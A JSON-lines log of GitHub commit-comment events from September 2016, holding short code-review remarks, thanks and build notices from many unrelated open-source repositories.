{"id":"4609793957","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":19149694,"position":15,"line":183,"path":"pyof/foundation/basic_types.py","commit_id":"3942f8d51c7e28c49d1436031a9d67cead0b7aa0","created_at":"2016-09-23T17:15:43Z","updated_at":"2016-09-23T17:15:43Z","body":"It is not clear to me if we should go with a netmask attribute as integer or on the 'IPAddress' format (XXX.XXX.XXX.XXX). @beraldoleal , what do you think?"}},"created_at":"2016-09-23T17:15:43Z"}
{"id":"4609794267","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":19149695,"position":18,"line":186,"path":"pyof/foundation/basic_types.py","commit_id":"3942f8d51c7e28c49d1436031a9d67cead0b7aa0","created_at":"2016-09-23T17:15:47Z","updated_at":"2016-09-23T17:15:47Z","body":"It is aways better to call ``super().__init__()`` before any other assignments.."}},"created_at":"2016-09-23T17:15:47Z"}
{"id":"4609797687","type":"CommitCommentEvent","actor":{"login":"mtheall"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19149707,"position":62,"line":1942,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T17:16:32Z","updated_at":"2016-09-23T17:16:32Z","body":"Do we want to set FUSE_CAP_POSIX_ACL here? This now implies default_permissions."}},"created_at":"2016-09-23T17:16:32Z"}
{"id":"4609813317","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitro-cancro/android_device_xiaomi_cancro"},"payload":{"comment":{"id":19149735,"position":null,"line":null,"path":null,"commit_id":"a5090a1bcbe033ab539908277a4cdf70ac4603f4","created_at":"2016-09-23T17:19:49Z","updated_at":"2016-09-23T17:19:49Z","body":"Revert this commit and do, by analogy with this commit:\r\nhttps://github.com/nitrogen-os-devices/android_device_lge_hammerhead/commit/527a7717ba491e0301519d841bf79332cdea5734"}},"created_at":"2016-09-23T17:19:49Z"}
{"id":"4609819002","type":"CommitCommentEvent","actor":{"login":"sbromberger"},"repo":{"name":"JuliaGraphs/GraphPlot.jl"},"payload":{"comment":{"id":19149752,"position":null,"line":null,"path":null,"commit_id":"b56c91cfbbc4f12c7da2889477f21c13a4c5340f","created_at":"2016-09-23T17:20:58Z","updated_at":"2016-09-23T17:20:58Z","body":"It's unconditional now."}},"created_at":"2016-09-23T17:20:58Z"}
{"id":"4609821715","type":"CommitCommentEvent","actor":{"login":"mschuchard"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19149765,"position":null,"line":null,"path":null,"commit_id":"f7e716cb1d37df343f6460dc2a849d729f980985","created_at":"2016-09-23T17:21:31Z","updated_at":"2016-09-23T17:21:31Z","body":"Thanks. I was looking in AtomLinter, but it appears I needed to go one level deeper in the dependencies to find the API source."}},"created_at":"2016-09-23T17:21:31Z"}
{"id":"4609823491","type":"CommitCommentEvent","actor":{"login":"johanhaleby"},"repo":{"name":"llamashoes/kubetail"},"payload":{"comment":{"id":19149770,"position":null,"line":null,"path":null,"commit_id":"cfbbd8fb5479ad3a913b447b6dfc22747af910cf","created_at":"2016-09-23T17:21:54Z","updated_at":"2016-09-23T17:21:54Z","body":"Hmm I'm a bit skeptical to `killall -9 kubectl`. You might have other kubectl's running. For example what if you do a client-side update of a replication controller and you're tailing some logs at the same time? This would kill the RC update which would be very counter intuitive and dangerous. Or am I exaggerating the problem?"}},"created_at":"2016-09-23T17:21:54Z"}
{"id":"4609827360","type":"CommitCommentEvent","actor":{"login":"mrsteyk"},"repo":{"name":"evgfilim1/itcat_carmabot"},"payload":{"comment":{"id":19149778,"position":null,"line":null,"path":null,"commit_id":"db1ef3737df6f5edf1d81bcb973f0b25c643e70c","created_at":"2016-09-23T17:22:42Z","updated_at":"2016-09-23T17:22:42Z","body":"Что с диффом?"}},"created_at":"2016-09-23T17:22:42Z"}
{"id":"4609828879","type":"CommitCommentEvent","actor":{"login":"rickyschoolsFS"},"repo":{"name":"rickyschoolsFS/ListManagement"},"payload":{"comment":{"id":19149780,"position":null,"line":null,"path":null,"commit_id":"8de4336433a6286d592e1227786b728aba5d3e4f","created_at":"2016-09-23T17:23:01Z","updated_at":"2016-09-23T17:23:01Z","body":"#53 "}},"created_at":"2016-09-23T17:23:01Z"}
{"id":"4609832124","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149786,"position":12,"line":565,"path":"libselinux/src/label_file.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:23:44Z","updated_at":"2016-09-23T17:23:44Z","body":"Yeah it probably should, but we're not using selinux_config.c, so I think this could be taken as a seperate item. The implementation seems brutal: \r\n\r\n`src/selinux_config.c:48:#define FILE_CONTEXT_SUBS_DIST 25\r\nsrc/selinux_config.c:530:\treturn get_path(FILE_CONTEXT_SUBS_DIST);\r\nsrc/file_path_suffixes.h:30:    S_(FILE_CONTEXT_SUBS_DIST, \"/contexts/files/file_contexts.subs_dist\")\r\n`\r\nI wouldn't consider that a good way to config something... but that's just me."}},"created_at":"2016-09-23T17:23:44Z"}
{"id":"4609832409","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"mochidev/MDAboutController"},"payload":{"comment":{"id":19149788,"position":null,"line":null,"path":null,"commit_id":"9373b97425bfcc2a5878918757a1a53ca61f1c62","created_at":"2016-09-23T17:23:48Z","updated_at":"2016-09-23T17:23:48Z","body":"Thanks"}},"created_at":"2016-09-23T17:23:48Z"}
{"id":"4609832829","type":"CommitCommentEvent","actor":{"login":"rleigh-codelibre"},"repo":{"name":"ome/omeroweb-install"},"payload":{"comment":{"id":19149793,"position":2,"line":2,"path":"ansible/templates/common/create_user.sh.j2","commit_id":"2e151e8ba84cefb9e4f45a6131e3962aac7cc3c1","created_at":"2016-09-23T17:23:52Z","updated_at":"2016-09-23T17:23:52Z","body":"You can add `:file:` here if you want to keep the backticks, then it's marked up as a filename."}},"created_at":"2016-09-23T17:23:52Z"}
{"id":"4609833840","type":"CommitCommentEvent","actor":{"login":"rleigh-codelibre"},"repo":{"name":"ome/omeroweb-install"},"payload":{"comment":{"id":19149795,"position":null,"line":null,"path":null,"commit_id":"2e151e8ba84cefb9e4f45a6131e3962aac7cc3c1","created_at":"2016-09-23T17:24:04Z","updated_at":"2016-09-23T17:24:04Z","body":"The changes all look good, thanks."}},"created_at":"2016-09-23T17:24:04Z"}
{"id":"4609834280","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"tanji/replication-manager"},"payload":{"comment":{"id":19149798,"position":null,"line":null,"path":null,"commit_id":"c2790c12547678953c16897efb24ed1cc1bd9e8e","created_at":"2016-09-23T17:24:10Z","updated_at":"2016-09-23T17:24:10Z","body":"Thanks. Looking into it."}},"created_at":"2016-09-23T17:24:10Z"}
{"id":"4609834390","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGraphs/GraphPlot.jl"},"payload":{"comment":{"id":19149799,"position":null,"line":null,"path":null,"commit_id":"b56c91cfbbc4f12c7da2889477f21c13a4c5340f","created_at":"2016-09-23T17:24:11Z","updated_at":"2016-09-23T17:24:11Z","body":"This is going to be unreliable in combination with precompilation, as I believe I've explained before. Pick one, hacks simulating optional dependencies or enabling precompilation."}},"created_at":"2016-09-23T17:24:11Z"}
{"id":"4609840330","type":"CommitCommentEvent","actor":{"login":"Inamicul21"},"repo":{"name":"Inamicul21/Hello_world"},"payload":{"comment":{"id":19149809,"position":5,"line":5,"path":"README.md","commit_id":"4d475ccad580b3125eb1e57b996b2a57136aedc8","created_at":"2016-09-23T17:25:08Z","updated_at":"2016-09-23T17:25:08Z","body":"Oh a 'has' document "}},"created_at":"2016-09-23T17:25:08Z"}
{"id":"4609841447","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149810,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:25:21Z","updated_at":"2016-09-23T17:25:21Z","body":"The numbers refer to lunch target emulator64-x86"}},"created_at":"2016-09-23T17:25:21Z"}
{"id":"4609844643","type":"CommitCommentEvent","actor":{"login":"Ad5001"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19149817,"position":null,"line":null,"path":null,"commit_id":"990b35518bcd2ad6fef0deb7cab6b81b756147c2","created_at":"2016-09-23T17:26:01Z","updated_at":"2016-09-23T17:26:01Z","body":"Does IT works to connect? :O"}},"created_at":"2016-09-23T17:26:01Z"}
{"id":"4609848272","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19149827,"position":17,"line":547,"path":"application/controllers/admin/participantsaction.php","commit_id":"a72784ddcc84abc6de6f74490f3f0f53e47b59ff","created_at":"2016-09-23T17:26:45Z","updated_at":"2016-09-23T17:26:45Z","body":"CPDB permissions is really complex ......\r\n"}},"created_at":"2016-09-23T17:26:45Z"}
{"id":"4609849920","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149833,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:27:07Z","updated_at":"2016-09-23T17:27:07Z","body":"fsck, i checked the host."}},"created_at":"2016-09-23T17:27:07Z"}
{"id":"4609853077","type":"CommitCommentEvent","actor":{"login":"RedstormJones"},"repo":{"name":"RedstormJones/PHP-SecurityServicesScraper"},"payload":{"comment":{"id":19149836,"position":null,"line":null,"path":null,"commit_id":"03adbf959f83c8d60511c773102b488758144292","created_at":"2016-09-23T17:27:46Z","updated_at":"2016-09-23T17:27:46Z","body":"StyleCI commit"}},"created_at":"2016-09-23T17:27:46Z"}
{"id":"4609853251","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19149837,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T17:27:48Z","updated_at":"2016-09-23T17:27:48Z","body":"oh looks like you already opened a new pr, that's fine too though a tiny bit noisier"}},"created_at":"2016-09-23T17:27:48Z"}
{"id":"4609854384","type":"CommitCommentEvent","actor":{"login":"RickDB"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19149839,"position":1,"line":1,"path":"JMMServer/JMMServiceImplementationImage.cs","commit_id":"8faa32f135b281728454adb36578ccacdea43403","created_at":"2016-09-23T17:28:03Z","updated_at":"2016-09-23T17:28:03Z","body":"Different class name or namespace for the other one?\r\n"}},"created_at":"2016-09-23T17:28:03Z"}
{"id":"4609855393","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"tanji/replication-manager"},"payload":{"comment":{"id":19149844,"position":null,"line":null,"path":null,"commit_id":"c2790c12547678953c16897efb24ed1cc1bd9e8e","created_at":"2016-09-23T17:28:14Z","updated_at":"2016-09-23T17:28:14Z","body":"Fixed"}},"created_at":"2016-09-23T17:28:14Z"}
{"id":"4609859709","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19149856,"position":20,"line":77,"path":"src/opnsense/mvc/app/controllers/OPNsense/CaptivePortal/forms/dialogZone.xml","commit_id":"0fb1cb1d68f9582b1108ac273f9d786fbadd0253","created_at":"2016-09-23T17:29:08Z","updated_at":"2016-09-23T17:29:08Z","body":"it should be \"transparent\""}},"created_at":"2016-09-23T17:29:08Z"}
{"id":"4609861968","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19149862,"position":null,"line":null,"path":null,"commit_id":"b6849e6245e92a6ce3342abdc455da3aed4107ec","created_at":"2016-09-23T17:29:35Z","updated_at":"2016-09-23T17:29:35Z","body":"Хорошая работа.\r\nGood work."}},"created_at":"2016-09-23T17:29:35Z"}
{"id":"4609862286","type":"CommitCommentEvent","actor":{"login":"darcatron"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19149863,"position":null,"line":null,"path":null,"commit_id":"f186feaa556f2fb8e51f81c690b142692e38be47","created_at":"2016-09-23T17:29:39Z","updated_at":"2016-09-23T17:29:39Z","body":"🚢 "}},"created_at":"2016-09-23T17:29:39Z"}
{"id":"4609862491","type":"CommitCommentEvent","actor":{"login":"sbromberger"},"repo":{"name":"JuliaGraphs/GraphPlot.jl"},"payload":{"comment":{"id":19149864,"position":null,"line":null,"path":null,"commit_id":"b56c91cfbbc4f12c7da2889477f21c13a4c5340f","created_at":"2016-09-23T17:29:42Z","updated_at":"2016-09-23T17:29:42Z","body":"Ah yes. I missed the implication there. I think we'll require Graphs, at least for now, and then decide what to do later."}},"created_at":"2016-09-23T17:29:42Z"}
{"id":"4609863506","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149868,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:29:53Z","updated_at":"2016-09-23T17:29:53Z","body":"From: out/target/product/generic_x86_64/system/lib64/libselinux.so\r\n\r\nOutput in bytes\r\n\r\nBefore:\r\n93568\r\n\r\nAfter:\r\n122808\r\n"}},"created_at":"2016-09-23T17:29:53Z"}
{"id":"4609863946","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19149874,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T17:29:59Z","updated_at":"2016-09-23T17:29:59Z","body":"yeah, I deleted the other one yesterday so it wouldn't be accepted. Won't do that in the future."}},"created_at":"2016-09-23T17:29:59Z"}
{"id":"4609867509","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19149888,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-23T17:30:41Z","updated_at":"2016-09-23T17:30:41Z","body":"Uh oh... this will break when the default values are used with an `Undefined offset 0` notice."}},"created_at":"2016-09-23T17:30:41Z"}
{"id":"4609872705","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":19149903,"position":null,"line":null,"path":null,"commit_id":"e6d71a38c20b9c95c5070efcd86ca5dc65e30069","created_at":"2016-09-23T17:31:44Z","updated_at":"2016-09-23T17:31:44Z","body":"need to set event_flags for Raid"}},"created_at":"2016-09-23T17:31:44Z"}
{"id":"4609874503","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149908,"position":47,"line":96,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:32:08Z","updated_at":"2016-09-23T17:32:08Z","body":"Its the only place within what is building for Android, but it is called other places, so ill take the initial route and move label_internal.h"}},"created_at":"2016-09-23T17:32:08Z"}
{"id":"4609875304","type":"CommitCommentEvent","actor":{"login":"pgromano"},"repo":{"name":"pgromano/walker"},"payload":{"comment":{"id":19149909,"position":48,"line":48,"path":"walker/util/_simulate.f95","commit_id":"322c846ee768f543f9a8cd85a43aa7b885494a1f","created_at":"2016-09-23T17:32:16Z","updated_at":"2016-09-23T17:32:16Z","body":"Asymmetric distribution of the random fluctuations. "}},"created_at":"2016-09-23T17:32:16Z"}
{"id":"4609876153","type":"CommitCommentEvent","actor":{"login":"adamloving"},"repo":{"name":"gorried/pingpong"},"payload":{"comment":{"id":19149914,"position":null,"line":null,"path":null,"commit_id":"1a3b6ef04f15c8c509b51b0c66ec14a700020a63","created_at":"2016-09-23T17:32:27Z","updated_at":"2016-09-23T17:32:27Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/10188118-177152666_1-s4-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-23T17:32:27Z"}
{"id":"4609878192","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19149916,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T17:32:52Z","updated_at":"2016-09-23T17:32:52Z","body":"fredagen den 23 september 2016 09.13.28 skrev  Fran Boon:\n> I disagree...the usecases may be beyond the ones we're focussed on where\n> authentication is important for approval...however it isn't terribly\n> relevant here anyway as the argument still remains for me either way.\nErr, what are you talking about?\n\nApproval, in the broadest possible sense of the word, is about /restricting/ \nauthority - so unrestricted approval is just simply a self-contradiction.\n\nBut anonymous is unrestricted by definition, so you just won't expose the \napproval facility to anonymous users. There is no use-case where this makes \nany sense (or name one).\n\nHowever, it is a regular case that you want to give the /system/ the authority \nto automatically approve anonymous user actions under certain circumstances - \nbut then this is a back-end call, always.\n\nTherefore, an anonymous call that does not carry any indication of being a \nback-end call is an unauthorized front-end controller and should be rejected \n(ideally even raise an error).\n\nA back-end caller can easily indicate system authority by specifying \napproved_by=0 (and does really not require auth.override or impersonate for \nthat with the change I proposed).\n\nMaybe you want to review my proposal again - I think you got that wrong.\n\nDominic\n"}},"created_at":"2016-09-23T17:32:52Z"}
{"id":"4609879361","type":"CommitCommentEvent","actor":{"login":"Arduinounoc"},"repo":{"name":"Arduinounoc/Aruino"},"payload":{"comment":{"id":19149920,"position":4,"line":6,"path":"README.md","commit_id":"fda6a2c608d8df8ff89de399cba2e6d19b6c3014","created_at":"2016-09-23T17:33:07Z","updated_at":"2016-09-23T17:33:07Z","body":"(            )"}},"created_at":"2016-09-23T17:33:07Z"}
{"id":"4609879575","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19149922,"position":null,"line":null,"path":null,"commit_id":"b6849e6245e92a6ce3342abdc455da3aed4107ec","created_at":"2016-09-23T17:33:08Z","updated_at":"2016-09-23T17:33:08Z","body":"Thanks :) Next will be Temple\r\nСпасибо! Закрываю Рейды Классики"}},"created_at":"2016-09-23T17:33:08Z"}
{"id":"4609880328","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19149925,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-23T17:33:17Z","updated_at":"2016-09-23T17:33:17Z","body":"Changing line 536 from `if (defined('PHP_CODESNIFFER_IN_TESTS') === true)` to `if (defined('PHP_CODESNIFFER_IN_TESTS') === true && empty($restrictions) === false)` is a quick & dirty fix for this."}},"created_at":"2016-09-23T17:33:17Z"}
{"id":"4609884443","type":"CommitCommentEvent","actor":{"login":"y-zlong"},"repo":{"name":"y-zlong/freecodecamp"},"payload":{"comment":{"id":19149933,"position":null,"line":null,"path":null,"commit_id":"09b1c48f1e019fb7df496892d4e13ffd17283e81","created_at":"2016-09-23T17:34:07Z","updated_at":"2016-09-23T17:34:07Z","body":"HTML部分\r\n             from表单提交注意事项"}},"created_at":"2016-09-23T17:34:07Z"}
{"id":"4609890857","type":"CommitCommentEvent","actor":{"login":"aeoncleanse"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19149946,"position":7,"line":7,"path":"lua/sim/tasks/GiveTask.lua","commit_id":"a7c99a2b2e9113e249b097dbff665ac09d7ef821","created_at":"2016-09-23T17:35:25Z","updated_at":"2016-09-23T17:35:25Z","body":"Do we need both the global and this local? "}},"created_at":"2016-09-23T17:35:25Z"}
{"id":"4609894185","type":"CommitCommentEvent","actor":{"login":"ondrejsika"},"repo":{"name":"kvadricek/ondrejsika.cz"},"payload":{"comment":{"id":19149956,"position":null,"line":null,"path":null,"commit_id":"5b7585ba1b1d3b4d59e2cd26f369d9dd643a7dc3","created_at":"2016-09-23T17:36:06Z","updated_at":"2016-09-23T17:36:06Z","body":"Jsi uzasna :)"}},"created_at":"2016-09-23T17:36:06Z"}
{"id":"4609899264","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19149971,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T17:37:08Z","updated_at":"2016-09-23T17:37:08Z","body":"fredagen den 23 september 2016 09.13.28 skrev  Fran Boon:\n> This still won't work with auth.override though...it requires us to use\n> s3_impersonate instead...potentially twice...a lot more overhead for no\n> real gain.\n\nThat is just simply not true.\n\n1) it doesn't require auth.override\n2) you don't need s3_impersonate\n\nWhat this change does is to make the approved_by ID a parameter of the call, \nwith a fallback to the current user_id. That's just it.\n\nSo, a back-end caller that wants to auto-approve something just specifies \napproved_by=0 - no override, no impersonate.\n\nA front-end controller can just let it fall through to the current user ID.\n\nNo ambuguity, no extra overheads (in fact, less overheads). Just straight \nparametrisation.\n\nDominic"}},"created_at":"2016-09-23T17:37:08Z"}
{"id":"4609900736","type":"CommitCommentEvent","actor":{"login":"chirag04"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19149973,"position":null,"line":null,"path":null,"commit_id":"4c2fa7e4eeb26c5bc893d0b117b2fb966bdcfead","created_at":"2016-09-23T17:37:24Z","updated_at":"2016-09-23T17:37:24Z","body":"👍 "}},"created_at":"2016-09-23T17:37:24Z"}
{"id":"4609901694","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19149977,"position":null,"line":null,"path":null,"commit_id":"ccdfcd33ea202bf69a512dd712a38f1ebb169670","created_at":"2016-09-23T17:37:37Z","updated_at":"2016-09-23T17:37:37Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 261](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1225&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:27:06"}},"created_at":"2016-09-23T17:37:37Z"}
{"id":"4609902753","type":"CommitCommentEvent","actor":{"login":"vpatryshev"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19149979,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-23T17:37:50Z","updated_at":"2016-09-23T17:37:50Z","body":"Why is it big? I guess this is pretty cool, streamlining the api and hiding the details."}},"created_at":"2016-09-23T17:37:50Z"}
{"id":"4609903784","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":19149981,"position":null,"line":null,"path":null,"commit_id":"275d8d76cf8413a8c06c40a8df759e1e814c84de","created_at":"2016-09-23T17:38:02Z","updated_at":"2016-09-23T17:38:02Z","body":"- Asobi ni Iku yo!\r\n- Bakuretsu Tenshi\r\n- Bakuretsu Tenshi: Infinity\r\n- Casshern Sins\r\n- Date A Live Movie: Mayuri Judgment"}},"created_at":"2016-09-23T17:38:02Z"}
{"id":"4609906486","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19149986,"position":18,"line":223,"path":"src/editor/map/map_context.cpp","commit_id":"c29ea4e2612fd919bb48ae25ebb2f01fccbc3231","created_at":"2016-09-23T17:38:34Z","updated_at":"2016-09-23T17:38:34Z","body":"`info.side` is _supposed_ to be the side number (from 1 to n). If this is crashing, that would seem to indicate that it's instead the side index (from 0 to n-1), somehow. I had thought that `team::side()` returned the side number, not the index, perhaps I was wrong..."}},"created_at":"2016-09-23T17:38:34Z"}
{"id":"4609909370","type":"CommitCommentEvent","actor":{"login":"chirag04"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19149989,"position":null,"line":null,"path":null,"commit_id":"4c2fa7e4eeb26c5bc893d0b117b2fb966bdcfead","created_at":"2016-09-23T17:39:07Z","updated_at":"2016-09-23T17:39:07Z","body":"@fred2028 also how do you currently handle closing the row when action or row is pressed?"}},"created_at":"2016-09-23T17:39:07Z"}
{"id":"4609916007","type":"CommitCommentEvent","actor":{"login":"valdevirpinheiro"},"repo":{"name":"valdevirpinheiro/formafrase"},"payload":{"comment":{"id":19150013,"position":null,"line":null,"path":null,"commit_id":"1367e903b812658ef24120b8a7144928f9967386","created_at":"2016-09-23T17:40:26Z","updated_at":"2016-09-23T17:40:26Z","body":"first commit"}},"created_at":"2016-09-23T17:40:26Z"}
{"id":"4609918473","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19150015,"position":null,"line":null,"path":null,"commit_id":"392bc642a35748f5687a1b853c81d17b173dbdcd","created_at":"2016-09-23T17:40:54Z","updated_at":"2016-09-23T17:40:54Z","body":"Courtesy of @BoGuu. \r\n"}},"created_at":"2016-09-23T17:40:54Z"}
{"id":"4609920349","type":"CommitCommentEvent","actor":{"login":"sandeshvijayraj"},"repo":{"name":"sandeshvijayraj/greetingcard"},"payload":{"comment":{"id":19150020,"position":null,"line":null,"path":null,"commit_id":"17bd876088ff6067a81608130f06eb5d5ff51516","created_at":"2016-09-23T17:41:16Z","updated_at":"2016-09-23T17:41:16Z","body":"initial upload"}},"created_at":"2016-09-23T17:41:16Z"}
{"id":"4609921894","type":"CommitCommentEvent","actor":{"login":"spershin"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19150024,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T17:41:35Z","updated_at":"2016-09-23T17:41:35Z","body":"This commit broke Facebook Wangle build. :("}},"created_at":"2016-09-23T17:41:35Z"}
{"id":"4609927549","type":"CommitCommentEvent","actor":{"login":"98PASS"},"repo":{"name":"vanessabandeira/POO_cinema"},"payload":{"comment":{"id":19150046,"position":null,"line":null,"path":null,"commit_id":"ee7c90344a9a6a6019dbdf4dc7c01d07fec43ef8","created_at":"2016-09-23T17:42:48Z","updated_at":"2016-09-23T17:42:48Z","body":"prime deveria ser plex, só precisa alterar o nome da variável, como foi discutido dia 20/09 no whatsapp às 23:19 (onde a decisão foi tomada)\r\nA uml ficou desatualizada, o que gerou o erro. Mas vamos consertar"}},"created_at":"2016-09-23T17:42:48Z"}
{"id":"4609931039","type":"CommitCommentEvent","actor":{"login":"aeoncleanse"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19150058,"position":null,"line":null,"path":null,"commit_id":"6c9e19883f378ae3993c07acf816813e49486615","created_at":"2016-09-23T17:43:30Z","updated_at":"2016-09-23T17:43:30Z","body":"What even was this, and how was it bugging out? "}},"created_at":"2016-09-23T17:43:30Z"}
{"id":"4609939124","type":"CommitCommentEvent","actor":{"login":"aeoncleanse"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19150078,"position":null,"line":null,"path":null,"commit_id":"a29292c65e3d8d6f88dc8a627eef09298eac825d","created_at":"2016-09-23T17:45:08Z","updated_at":"2016-09-23T17:45:08Z","body":"Nice  one"}},"created_at":"2016-09-23T17:45:08Z"}
{"id":"4609941571","type":"CommitCommentEvent","actor":{"login":"dhirajsb"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19150086,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T17:45:35Z","updated_at":"2016-09-23T17:45:35Z","body":"It's already exhausted attempts up to the configurable maximum back off. Chances are slim that Salesforce connection would work after so many retries (30 by default). Therefore the user MUST handle the exception, sending a message on a JMS queue or something to report it as a critical error to an ops team to be handled. \r\n\r\nIt could be a networking or account setup issue that could be blocking the connection. It doesn't make sense to keep trying infinitely, does it? I don't see any published policies about it, but what if Salesforce deems it as a DOS attack and locks out the account? "}},"created_at":"2016-09-23T17:45:35Z"}
{"id":"4609943649","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19150093,"position":14,"line":29,"path":"libselinux/src/procattr.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:45:59Z","updated_at":"2016-09-23T17:45:59Z","body":"ANDROID is set by the build system, so nothing we need to do there, we just had the wrong define guarding it on the fork. I think I like BUILD_HOST the best... I currently have a long and clunky one on my newest force-push"}},"created_at":"2016-09-23T17:45:59Z"}
{"id":"4609947488","type":"CommitCommentEvent","actor":{"login":"neskk"},"repo":{"name":"kvangent/PokeAlarm"},"payload":{"comment":{"id":19150101,"position":null,"line":null,"path":null,"commit_id":"73873a14fa95444f021254531bee8ecae6a483c3","created_at":"2016-09-23T17:46:43Z","updated_at":"2016-09-23T17:46:43Z","body":"Filter by moves is a neat feature too ;)\r\nHave you decided the race conditions between minimum IV and maximum distance? i.e. which one overrides the other?\r\nThere should be an option to decide whether the filtering acts by intersecting all the conditions (IV > 80 && Dist < 1000) or adding them logically (IV > 80 || Dist <1000)."}},"created_at":"2016-09-23T17:46:43Z"}
